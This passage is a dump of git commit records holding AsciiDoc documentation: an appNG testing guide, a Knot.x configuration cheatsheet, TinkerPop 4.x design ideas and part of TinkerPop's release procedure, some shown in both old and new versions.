xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/jdbc\n\t\thttp:\/\/www.springframework.org\/schema\/jdbc\/spring-jdbc.xsd\n\t\thttp:\/\/www.springframework.org\/schema\/beans \n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\t\n\t<jdbc:initialize-database enabled=\"true\" data-source=\"datasource\"><!--1-->\n\t\t<jdbc:script location=\"classpath:\/sql\/init-db.sql\" \/><!--2-->\n\t<\/jdbc:initialize-database>\n<\/beans>\n----\n<1> use `<jdbc:initialize-database>` and make a reference to the built in <<app-datasource, datasource>>\n<2> set the classpath location for the DDL script\n\nIn your testcase, you just need to add `beans-test.xml` to the `@ContextConfiguration`-annotation \n\n[source,java]\n----\n@ContextConfiguration(locations = { TestBase.TESTCONTEXT_JPA, \"classpath:\/beans-test.xml\" }\n----","old_contents":"== Testing\n=== General\nAppNG also offers support for unit- and integration testing your appNG applications. Therefore, it uses the testing capabilities of the Spring framework. See the {spring}\/spring-framework-reference\/htmlsingle\/#testing[Reference Documentation^] for details on testing with Spring.\n\nTo enable test support, just add the following dependency to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.appng<\/groupId>\n <artifactId>appng-testsupport<\/artifactId>\n <version>${appNG.version}<\/version>\n<\/dependency>\n----\n\nNext, use {appng}\/org\/appng\/testsupport\/TestBase.html[org.appng.testsupport.TestBase^] as a base class for your unit tests. You can test with or without JPA support enabled.\n\nWithout JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(initializers = MyTest.class)\npublic class EmployeesTest extends TestBase {\n\n public MyTest() {\n super(\"myapp\", \"application-home\");\n }\n \n}\n----\n\nWith JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(\n locations = { TestBase.TESTCONTEXT_JPA }, initializers = MyTest.class)\npublic class EmployeesTest extends TestBase {\n\n public MyTest() {\n super(\"myapp\", \"application-home\");\n setEntityPackage(\"com.myapp.domain\");\n setRepositoryBase(\"com.myapp.repository\");\n }\n \n}\n----\n\n=== Testing a datasource:\n[source,java]\n----\n@org.junit.Test\npublic void testShowEmployees() throws ProcessingException, IOException {\n\taddParameter(\"selectedId\", \"1\"); \/\/ <!--1-->\n\tinitParameters(); \/\/ <!--2-->\n\tDataSourceCall dataSourceCall = getDataSource(\"employees\");\/\/ <!--3-->\n\tCallableDataSource callableDataSource = dataSourceCall.getCallableDataSource(); \/\/ <!--4-->\n\tcallableDataSource.perform(\"aPage\"); \/\/ <!--5-->\n\tvalidate(callableDataSource.getDatasource());\/\/ <!--6-->\n}\n----\n<1> adds a parameter\n<2> initialize the parameters, must be called after parameters have been added\n<3> retrieve a `DataSourceCall` representing the datasource by its id\n<4> get a `CallableDataSource`\n<5> perform the `CallableDataSource`\n<6> validate the response\n\nIn step 6, a {appng}\/org\/appng\/testsupport\/validation\/WritingXmlValidator.html[org.appng.testsupport.validation.WritingXmlValidator^] is used to compare the contents of a *control file* with the XML that results from marshalling the given object (in this case a `org.appng.xml.platform.Datasource`). The control file must be located at `src\/test\/resources\/xml`. It's name is derived from the name of the test class and the name of the test method. So in this example, it would be `EmployeesTest-testShowEmployees.xml`.\n\nNOTE: For initially creating and later updating your control files, just set `WritingXmlValidator.writeXml = true` and the control files will be written to `src\/test\/resources\/xml`. \n\n=== Testing an action:\n[source,java]\n----\n@org.junit.Test\npublic void testCreateEmployee() throws ProcessingException, IOException {\n\tActionCall action = getAction(\"employeeEvent\", \"create\");\/\/ <!--1-->\n\taction.withParam(FORM_ACTION, \"create\");\/\/ <!--2-->\n\tEmployee formBean = new Employee(\"John\", \"Doe\");\/\/ <!--3-->\n\tCallableAction callableAction = action.getCallableAction(formBean);\/\/ <!--4-->\n\tFieldProcessor fieldProcessor = callableAction.perform();\/\/ <!--5-->\n\tvalidate(fieldProcessor.getMessages(), \"-messages\");\/\/ <!--6-->\n\tvalidate(callableAction.getAction(), \"-action\");\/\/ <!--7-->\n}\n----\n<1> retrieve an `ActionCall` representing the action by its event-id and id\n<2> add required parameters to the action\n<3> create a form bean\n<4> retrieve a `CallableAction`\n<5> perform the `CallableAction` receive a `FieldProcessor`\n<6> use a `validate(...)`-method that takes a suffix as a parameter, validating the messages of the `fieldProcessor`\n<7> use the same validate method to validte the contents of the action\n\nNOTE: Although you pass the `formBean` as a whole to `ActionCall.getCallableAction(formBean)`, this `formBean` is being copied internally. This copy, which is passed to the `ActionProvider<T>`, will contain only those properties that are mapped and writable in the datasource used by the action.\n\n=== Adding custom bean definitions for testing\nYou can add custom bean definitons for your tests. For example, if you want to run a SQL script to initialize your test database, you could provide a file `beans-test-xml` located at `src\/test\/resources`.\n\n.beans-test.xml\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/jdbc\n\t\thttp:\/\/www.springframework.org\/schema\/jdbc\/spring-jdbc.xsd\n\t\thttp:\/\/www.springframework.org\/schema\/beans \n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\t\n\t<jdbc:initialize-database enabled=\"true\" data-source=\"datasource\"><!--1-->\n\t\t<jdbc:script location=\"classpath:\/sql\/init-db.sql\" \/><!--2-->\n\t<\/jdbc:initialize-database>\n<\/beans>\n----\n<1> use `<jdbc:initialize-database>` and make a reference to the built in <<app-datasource, datasource>>\n<2> set the classpath location for the DDL script\n\nIn your testcase, you just need to add `beans-test.xml` to the `@ContextConfiguration`-annotation \n\n[source,java]\n----\n@ContextConfiguration(locations = { TestBase.TESTCONTEXT_JPA, \"classpath:\/beans-test.xml\" }\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"378df99d1b3cec143a00e6ce918aec64cb2f5322","subject":"Updated javadocs","message":"Updated javadocs\n","repos":"Cognifide\/knotx,Cognifide\/knotx","old_file":"knotx-knot\/knotx-knot-action\/src\/main\/asciidoc\/dataobjects.adoc","new_file":"knotx-knot\/knotx-knot-action\/src\/main\/asciidoc\/dataobjects.adoc","new_contents":"= Cheatsheets\n\n[[ActionKnotOptions]]\n== ActionKnotOptions\n\n++++\n Describes an Action Knot configuration options\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[adapters]]`adapters`|`Array of link:dataobjects.html#ActionSettings[ActionSettings]`|\n+++\nSets the adapters that will be responsible for communicating with external services in order to\n process the request.\n+++\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the verticle\n+++\n|[[deliveryOptions]]`deliveryOptions`|`link:dataobjects.html#DeliveryOptions[DeliveryOptions]`|\n+++\nSets the Vert.x Event Bus Delivery Options\n+++\n|[[formIdentifierName]]`formIdentifierName`|`String`|\n+++\nSets the name of the hidden input tag which is added by Action Knot.\n+++\n|===\n\n[[ActionSettings]]\n== ActionSettings\n\n++++\n Describes a physical details of HTTP service endpoint that consumes form submitions\n from AdapterServiceKnot.\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the service adapter\n+++\n|[[allowedRequestHeaders]]`allowedRequestHeaders`|`Array of String`|\n+++\nSets list of HTTP client request headers that are allowed to be passed to Adapter. No request headers are allowed if not set.\n+++\n|[[allowedResponseHeaders]]`allowedResponseHeaders`|`Array of String`|\n+++\nSets list of HTTP response headers that are allowed to be sent in a client response. No response headers are allowed if not set.\n+++\n|[[name]]`name`|`String`|\n+++\nSet the name of the service the will be used on html snippet level.\n+++\n|[[params]]`params`|`Json object`|\n+++\nSet the service parameters to be consumed by the adapter.\n+++\n|===\n\n","old_contents":"= Cheatsheets\n\n[[ActionKnotOptions]]\n== ActionKnotOptions\n\n++++\n Describes an Action Knot configuration options\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[adapters]]`adapters`|`Array of link:dataobjects.html#ActionSettings[ActionSettings]`|\n+++\n\nConfigures the available ActionAdapters to be used by the knot\nSets the adapters that will be responsible for communicating with external services in order to\n process the request.\n+++\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the verticle\n+++\n|[[deliveryOptions]]`deliveryOptions`|`link:dataobjects.html#DeliveryOptions[DeliveryOptions]`|\n+++\nSets the Vert.x Event Bus Delivery Options\nSets the value of the 'name' attribute of the <code><form><\/code> tag.\n If not set, a default value is <code>_frmId<\/code>\nSets the name of the hidden input tag which is added by Action Knot.\n+++\n|===\n\n[[ActionSettings]]\n== ActionSettings\n\n++++\n Describes a physical details of HTTP service endpoint that consumes form submitions\n from AdapterServiceKnot.\n++++\n'''\n\n[cols=\">25%,^25%,50%\"]\n[frame=\"topbot\"]\n|===\n^|Name | Type ^| Description\n|[[address]]`address`|`String`|\n+++\nSets the EB address of the service adapter\n+++\n|[[allowedRequestHeaders]]`allowedRequestHeaders`|`Array of String`|\n+++\nSets list of HTTP client request headers that are allowed to be passed to Adapter. No request headers are allowed if not set.\n+++\n|[[allowedResponseHeaders]]`allowedResponseHeaders`|`Array of String`|\n+++\nSets list of HTTP response headers that are allowed to be sent in a client response. No response headers are allowed if not set.\n+++\n|[[name]]`name`|`String`|\n+++\nSet the name of the service the will be used on html snippet level.\n+++\n|[[params]]`params`|`Json object`|\n+++\nSet the service parameters to be consumed by the adapter.\n+++\n|===\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb8facfd35adf5cb18fd761d7610e455a9bbfea3","subject":"Added TINKERPOP-1417 to the future dev doc CTR","message":"Added TINKERPOP-1417 to the future dev doc CTR\n","repos":"apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop","old_file":"docs\/src\/dev\/future\/index.asciidoc","new_file":"docs\/src\/dev\/future\/index.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*4.0.0*\n\n:toc-position: left\n\n= TinkerPop 4.x Design Ideas\n\nTinkerPop 4.x is not a version considered on the immediate horizon, but there are often points in the day to day\ndevelopment of TinkerPop 3.x where there are changes of importance, novelty and usefulness that are so big that they\ncould only be implemented under a major new version. This document is meant to track these concepts as they develop,\nso that at some point in the future they can be referenced in a single place.\n\nThere is no particular layout or style to this document. Simple bullet points, open questions posed as single\nsentences, or fully structured document headers and content are all acceptable. The main point is to capture ideas\nfor future consideration when 4.x becomes the agenda of the day for The TinkerPop.\n\nimage:tp4-think.png[]\n\n== The Main Features\n\nTinkerPop4 should focus on the most successful aspects of TinkerPop3 and it should avoid the traps realized in TinkerPop3.\nThese items include:\n\n* The concept of Gremlin as both a virtual machine and language.\n** A standard bytecode specification should be provided.\n** A standard machine architecture should be provided.\n* The concept of Gremlin language variants.\n** It should be easy to create Gremlin variants in every major programming language.\n** A standard template should be followed for all languages.\n** Apache TinkerPop should provide variants in all major programming languges.\n* The concept of `Traversal` as the sole means of interacting with the graph.\n** The role of Blueprints should be significantly reduced.\n** The role of Gremlin should be significantly increased.\n\n== Hiding Blueprints\n\nOriginally from the link:https:\/\/lists.apache.org\/thread.html\/b4d80072ad36849b4e9cd3308f87115660574e3e7a4abb7ee68e959b@%3Cdev.tinkerpop.apache.org%3E[mailing list]:\n\nThroughout our documentation we show uses of the \u201cBlueprints API\u201d (i.e. Graph\/Vertex\/Edge\/etc. classes & methods) as\nwell as the use of the Traversal API (i.e. Gremlin).\n\nEnabling users to have two ways of interacting with the graph system has its problems:\n\n1. The DetachedXXX problem \u2014 how much data should a returned vertex\/edge\/etc. have associated with it?\n2. `graph.addVertex()` and `g.addV()` \u2014 which should I use? The first is faster but is not recommended.\n3. `SubgraphStrategy` leaking \u2014 I get subgraphs with Gremlin, but can then directly interact with the vertex objects to see more than I should.\n4. `VertexProgram` model \u2014 I write traversals with Traversal API, but then develop VertexPrograms with the Blueprints API. That\u2019s weird.\n5. GremlinServer returning fat objects \u2014 Serializers are created property-rich vertices and edges. The awkward HaltedTraversalStrategy solution.\n6. \u2026 various permutations of these source problems.\n\nIn TinkerPop4 the solution might be as follows:\n\nThere should be two \u201cGraph APIs.\u201d\n\n1. Provider Graph API: This is the current Blueprints API with `Graph.addVertex()`, `Vertex.edges()`, `Edge.inVertex()`, etc.\n2. User Graph API: This is a ReferenceXXX API.\n\nThe first API is well known, but the second bears further discussion. `ReferenceGraph` is simply a reference\/dummy\/proxy\nto the provider Graph API. `ReferenceGraph` has the following API:\n\n* `ReferenceGraph.open()`\n* `ReferenceGraph.close()`\n* `ReferenceGraph.tx()` \/\/ assuming we like the current transaction model (??)\n* `ReferenceGraph.traversal()`\n\nThat is it. What does this entail? Assume the following traversal:\n\n[source,java]\n----\ng = ReferenceGraph.open(config).traversal()\ng.V(1).out(\u2018knows\u2019)\n----\n\n`ReferenceGraph` is almost like a `RemoteGraph` (`RemoteStrategy`) in that it makes a connection (remote or inter-JVM)\nto the provider Graph API. When `g.V(1).out(\u2018knows\u2019)` executes, it is really sending the bytecode to the provider Graph\nfor execution (as specified by the config of `ReferenceGraph.open()`). Thus, once it hits the provider's graph,\n`ProviderVertex`, `ProviderEdge`, etc. are the objects being processed. However, what the traversal\u2019s `Iterator<Vertex>`\nreturns is `ReferenceVertex`! That is, it never returns `ProviderVertex`. In this way, regardless if the user is\ngoing \u201cover the wire\u201d or within the same JVM or against a different provider\u2019s graph database or from\nGremlin-Python\/C#\/etc., all the vertices are simply \u2018reference vertices\u2019 (id + label). This makes it so that users\nnever interact with the graph element objects themselves directly. They can ONLY interact with the graph via\ntraversals! At most they can `ReferenceVertex.id()` and `ReferenceVertex.label()`. Thats it, \u2014 no mutations, not\nwalking edges, nada! And moreover, since ReferenceXXX has enough information to re-attach to the source graph, they\ncan always do the following to get more information:\n\n[source,java]\n----\nv = g.V(1).out(\u2018knows\u2019).next()\ng.V(v).values(\u2018name\u2019)\n----\n\nThis split into two Graph APIs will enables us to make a hard boundary between what the provider (vendor) needs to\nimplement and what the user (developer) gets to access.\n\n=== Comments\n\nThere is a question mark next to `ReferenceGraph.tx()` - Transactions are a bit of an open question for future versions\nof TinkerPop and likely deserve their own section in this document. The model used for last three version of TinkerPop\nnow is rooted in the Neo4j approach to transactions and is often more trouble than it should be for us and providers.\nDistributed transactions are a challenge and don't apply to every provider. Transactions are further complicated by\nGLVs. The idea of local subgraphs for mutations and transaction management might be good but that goes against having\njust `ReferenceGraph`.\n\n== Gremlin Language Subset\n\nOn link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1417[TINKERPOP-1417], it was suggested that we \"Create a\nGremlin language subset that is easy to implement on any VM\". Implementing the Gremlin VM in another language is\npretty straightforward. However, its a lot of code.. all these steps implementations. One thing we could do to make\nit easy for database providers not on the JVM (e.g. ArangoDB and C) is to create \"Gremlito\" (Gremlin--). This language\nsubset wouldn't support side-effects, sacks, match, etc. Basically, just simple traversal steps and reducing barrier\nterminals.\n\nThus:\n\n* out, in, both, values, outE, inV, id, label, etc.\n* repeat\n* select, project\n* where, has, limit, range, is, dedup\n* path, simplePath, cyclicPath\n* groupCount, sum, group, count, max, min, etc. (reducing barriers)\n\n=== Comments\n\nThis has an interesting potential impact on GLVs because \"Little Gremlin\" could be implemented within them for\nclient-side traversals over remote subgraphs, where the subgraph is like a remote transaction. All graph mutations\nessentially build a subgraph which is merged into the primary graph. That subgraph is effectively the \"transaction\".\nBuild it locally then submit it remotely and have the server sort out the merging. It's perhaps the most natural way\nto load data. With \"Gremlinito\" you then get the added power of being able to traverse a local subgraph.","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*4.0.0*\n\n:toc-position: left\n\n= TinkerPop 4.x Design Ideas\n\nTinkerPop 4.x is not a version considered on the immediate horizon, but there are often points in the day to day\ndevelopment of TinkerPop 3.x where there are changes of importance, novelty and usefulness that are so big that they\ncould only be implemented under a major new version. This document is meant to track these concepts as they develop,\nso that at some point in the future they can be referenced in a single place.\n\nThere is no particular layout or style to this document. Simple bullet points, open questions posed as single\nsentences, or fully structured document headers and content are all acceptable. The main point is to capture ideas\nfor future consideration when 4.x becomes the agenda of the day for The TinkerPop.\n\nimage:tp4-think.png[]\n\n== The Main Features\n\nTinkerPop4 should focus on the most successful aspects of TinkerPop3 and it should avoid the traps realized in TinkerPop3.\nThese items include:\n\n* The concept of Gremlin as both a virtual machine and language.\n** A standard bytecode specification should be provided.\n** A standard machine architecture should be provided.\n* The concept of Gremlin language variants.\n** It should be easy to create Gremlin variants in every major programming language.\n** A standard template should be followed for all languages.\n** Apache TinkerPop should provide variants in all major programming languges.\n* The concept of `Traversal` as the sole means of interacting with the graph.\n** The role of Blueprints should be significantly reduced.\n** The role of Gremlin should be significantly increased.\n\n\n== Hiding Blueprints\n\nOriginally from the link:https:\/\/lists.apache.org\/thread.html\/b4d80072ad36849b4e9cd3308f87115660574e3e7a4abb7ee68e959b@%3Cdev.tinkerpop.apache.org%3E[mailing list]:\n\nThroughout our documentation we show uses of the \u201cBlueprints API\u201d (i.e. Graph\/Vertex\/Edge\/etc. classes & methods) as\nwell as the use of the Traversal API (i.e. Gremlin).\n\nEnabling users to have two ways of interacting with the graph system has its problems:\n\n1. The DetachedXXX problem \u2014 how much data should a returned vertex\/edge\/etc. have associated with it?\n2. `graph.addVertex()` and `g.addV()` \u2014 which should I use? The first is faster but is not recommended.\n3. `SubgraphStrategy` leaking \u2014 I get subgraphs with Gremlin, but can then directly interact with the vertex objects to see more than I should.\n4. `VertexProgram` model \u2014 I write traversals with Traversal API, but then develop VertexPrograms with the Blueprints API. That\u2019s weird.\n5. GremlinServer returning fat objects \u2014 Serializers are created property-rich vertices and edges. The awkward HaltedTraversalStrategy solution.\n6. \u2026 various permutations of these source problems.\n\nIn TinkerPop4 the solution might be as follows:\n\nThere should be two \u201cGraph APIs.\u201d\n\n1. Provider Graph API: This is the current Blueprints API with `Graph.addVertex()`, `Vertex.edges()`, `Edge.inVertex()`, etc.\n2. User Graph API: This is a ReferenceXXX API.\n\nThe first API is well known, but the second bears further discussion. `ReferenceGraph` is simply a reference\/dummy\/proxy\nto the provider Graph API. `ReferenceGraph` has the following API:\n\n* `ReferenceGraph.open()`\n* `ReferenceGraph.close()`\n* `ReferenceGraph.tx()` \/\/ assuming we like the current transaction model (??)\n* `ReferenceGraph.traversal()`\n\nThat is it. What does this entail? Assume the following traversal:\n\n[source,java]\n----\ng = ReferenceGraph.open(config).traversal()\ng.V(1).out(\u2018knows\u2019)\n----\n\n`ReferenceGraph` is almost like a `RemoteGraph` (`RemoteStrategy`) in that it makes a connection (remote or inter-JVM)\nto the provider Graph API. When `g.V(1).out(\u2018knows\u2019)` executes, it is really sending the bytecode to the provider Graph\nfor execution (as specified by the config of `ReferenceGraph.open()`). Thus, once it hits the provider's graph,\n`ProviderVertex`, `ProviderEdge`, etc. are the objects being processed. However, what the traversal\u2019s `Iterator<Vertex>`\nreturns is `ReferenceVertex`! That is, it never returns `ProviderVertex`. In this way, regardless if the user is\ngoing \u201cover the wire\u201d or within the same JVM or against a different provider\u2019s graph database or from\nGremlin-Python\/C#\/etc., all the vertices are simply \u2018reference vertices\u2019 (id + label). This makes it so that users\nnever interact with the graph element objects themselves directly. They can ONLY interact with the graph via\ntraversals! At most they can `ReferenceVertex.id()` and `ReferenceVertex.label()`. Thats it, \u2014 no mutations, not\nwalking edges, nada! And moreover, since ReferenceXXX has enough information to re-attach to the source graph, they\ncan always do the following to get more information:\n\n[source,java]\n----\nv = g.V(1).out(\u2018knows\u2019).next()\ng.V(v).values(\u2018name\u2019)\n----\n\nThis split into two Graph APIs will enables us to make a hard boundary between what the provider (vendor) needs to\nimplement and what the user (developer) gets to access.\n\n=== Comments\n\nThere is a question mark next to `ReferenceGraph.tx()` - Transactions are a bit of an open question for future versions\nof TinkerPop and likely deserve their own section in this document. The model used for last three version of TinkerPop\nnow is rooted in the Neo4j approach to transactions and is often more trouble than it should be for us and providers.\nDistributed transactions are a challenge and don't apply to every provider. Transactions are further complicated by\nGLVs. The idea of local subgraphs for mutations and transaction management might be good but that goes against having\njust `ReferenceGraph`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a62b65594c4d7f717a0976732239367a6ab0b7fc","subject":"Added some more notes to release documents.","message":"Added some more notes to release documents.\n","repos":"apache\/incubator-tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,samiunn\/incubator-tinkerpop,newkek\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,BrynCooke\/incubator-tinkerpop,newkek\/incubator-tinkerpop,apache\/tinkerpop,newkek\/incubator-tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,BrynCooke\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,jorgebay\/tinkerpop","old_file":"docs\/src\/dev\/developer\/release.asciidoc","new_file":"docs\/src\/dev\/developer\/release.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nRelease Process\n===============\n\nThis document describes the steps required to release a version of TinkerPop. The release is handled by a \"release\nmanager\" (a committer fulfills this role), who ensures that the steps in this document are executed. The process is\nmulti-phased and can therefore take several weeks to complete given the time needed for Apache voting and community\nfeedback. Once a release point has been identified, the following phases represent the flow of \"release\":\n\n* Pre-flight check.\n* Optionally, produce a release candidate for community feedback.\n* Submit the official release for PMC vote.\n* Release and promote.\n\nNOTE: It might be helpful to use this document as generated from the currently release as opposed to one generate\nfrom a previous version or from recent `SNAPSHOT`. When using one generated for release, all the \"versions\" in the\ncommands end up being set to the version that is being released, making cut and paste of those commands less labor\nintensive and error prone.\n\nPre-flight Check\n----------------\n\nThe \"pre-flight check\" is a list of things performed by the release manager during the weeks leading up to a scheduled\nday to release. These checks will help to ensure that that release day goes smoothly by identifying problems up early\nand communicating with other members of the community.\n\n. Fourteen days before release, issue an email to the dev mailing list to remind the community of the pending release.\n.. Note any important issues open in JIRA in that post.\n.. Request review and update of the \"upgrade documentation\" and CHANGELOG.\n. Seven days before release, announce the code freeze on the dev mailing list to remind the community that the branch\nunder release is protected. Tweaks to documentation and other odds and ends related to release are still allowed\nduring this period.\n. At some point during the week:\n.. Run the full integration test suite: `mvn clean install -DskipIntegrationTests=false -DincludeNeo4j`\n.. Deploy a final SNAPSHOT to the snapshot repository.\n.. Review LICENSE and NOTICE files to make sure that no <<dependencies,changes are needed>>.\n.. Review javadoc filters on the \"Core API\" docs to be sure nothing needs to change.\n.. Review JIRA tickets in the release and ensure that:\n... All tickets categorized by having a \"Component\" assigned.\n... All tickets are either of type \"Bug\" or \"Enhancement\".\n... All tickets where work was completed are \"Closed\"\n.... Search for \"closed the pull request\" in comments for hints on possible tickets that were left open by mistake).\n.... Look for tickets marked as \"Resolved\" (some users might not have rights to mark as \"Closed\" - convert these to \"Closed\".\n... All tickets not marked \"Fixed\", \"Done\", or \"Implemented\" for their Resolution should not have a Fix Version\nassigned (use common sense when reviewing these tickets before removing the Fix Version as it is possible the incorrect\nResolution may have been assigned).\n. When all documentation changes are in place, use `bin\/publish-docs.sh` to deploy a final `SNAPSHOT` representation\nof the docs and thus validate that there are no issues with the documentation generation process. Request review\nof the published documentation on the dev mailing list.\n\nRelease Candidate\n-----------------\n\nA release candidate is an unofficial release that is represented by a tagged version in the Git repository. It is\noffered in cases where there is significant change in a particular version and the potential for upgrades and problems\nmight be high.\n\n. `mvn clean install -DincludeNeo4j`\n.. `mvn verify -DskipIntegrationTests=false -DincludeNeo4j`\n.. `mvn verify -DskipPerformanceTests=false`\n. `bin\/publish-docs.sh <username>` - note that under a release candidate the documentation is published as SNAPSHOT\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update the project files to reference a non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and `git push`\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. `mvn clean install`\n. `mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false` to go back to SNAPSHOT\n. `git commit -a -m \"Returned to xx.yy.zz-SNAPSHOT\"` and `git push`\n. Announce the release candidate to `dev` mailing list and await feedback\n. Repeat as required or proceed to the next phase\n\nPMC Vote\n--------\n\nA positive vote for a particular release from the TinkerPop PMC is required to move to the following phase.\n\n. By this point, the testing performed during the code freeze should have validated the release. If however there\nare additional tests to perform that the release manager feels are relevant, they should be performed now. In other\nwords, there is no need to rebuild the `SNAPSHOT` yet another time unless there are circumstances that would call its\nvalidity into question.\n. Update `CHANGELOG.asciidoc`:\n.. Update the release date\n.. Generate the JIRA release notes report for the current version and append them to the `CHANGELOG.asciidoc`.\n... Use an \"advanced\" search to filter out JIRA issues already released on other versions. For example: `fixVersion\n= 3.2.0 AND fixVersion not in (3.1.3, 3.1.2, 3.1.1, 3.1.0)`.\n... Consider use of an \"Excel\" export to organize, sort (by type and then id) and prepare the JIRA tickets to be pasted to `CHANGELOG.asciidoc`\n... Be sure to include a link to other versions in the `CHANGELOG.asciidoc` that were previously released while the\ncurrent release was under development as this new release will have those changes included within it. Please see\n3.2.1 for an example.\n.. Organize \"breaking\" changes to be clearly marked (use JIRA and the \"breaking\" label to identify those)\n. Update \"upgrade documentation\":\n.. Update the release date.\n.. Update the link to CHANGELOG.asciidoc\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update project files to reference the non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and push\n. `mvn clean install` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n. `bin\/process-docs.sh` and validate the generated documentation locally (don't rely on \"SUCCESS\" - scroll up through logs to ensure there were no errors and view the HTML directly)\n. `bin\/publish-docs.sh <username>` - Note that this step requires no additional processing as the previous step.\nhandled document generation and this step now merely needs to upload what was generated.\n. `mvn deploy -Papache-release -DcreateChecksum=true -DskipTests` - deploy signed artifacts with checksums to 